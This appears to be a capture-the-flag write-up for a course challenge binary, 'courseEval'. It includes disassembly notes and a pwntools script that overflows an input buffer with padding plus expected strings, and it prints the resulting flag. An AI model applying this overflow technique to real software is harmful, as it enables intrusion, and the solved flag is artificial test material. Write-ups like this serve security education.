Same as Shakira/Twingo ecc

./courseEval 

Dear Student, you already filled the teaching questionnaire, but we miss the overall course evaluation!
===================
A recap of your data:
Student ID: UniPD_01
Best course in the WORLD: CPP-
Best part of the course: WEB-
Best Teaching Assistant of all Time: Luca
===================
Insert overall course evaluation (max 50 char):


call    questionnaire

I. lea     rsi, aUnipd01   ; "UniPD_01"
II. lea     rsi, aCpp       ; "CPP-"
III. lea     rsi, aPwn       ; "PWN-"
IV. lea     rsi, aPier      ; "Pier"

If we open in gdb, our target is this puts:
0x00005555555555e5 <+600>:	call   0x555555555040 <puts@plt>

Where It probably print's our flag

0x00005555555555d6 <+585>:	call   0x5555555550a0 <fgets@plt>
   0x00005555555555db <+590>:	lea    -0x170(%rbp),%rax
   0x00005555555555e2 <+597>:	mov    %rax,%rdi
   0x00005555555555e5 <+600>:	call   0x555555555040 <puts@plt>

from pwn import*

payload = b'A'*56 + b'UniPD_01' + b'CPP-' + b'PWN-' + b'Pier'

p = process('./courseEval')
p.sendlineafter(b'Insert overall course evaluation (max 50 char):', payload)
output = p.recvall()

print(output)


python3 payload.py 
[+] Starting local process './courseEval': pid 17045
[+] Receiving all data: Done (252B)
[*] Process './courseEval' stopped with exit code 0 (pid 17045)
b"\nWhat?? You still think CPP is the best course in the world? PWNing the best part? And you changed your mind saying Pier is the best teaching assistant of all Time? Wow dude I'm so happy :') Please accept this gift: SPRITZ{CPP_PWNs_Everything_173453}\n\n"

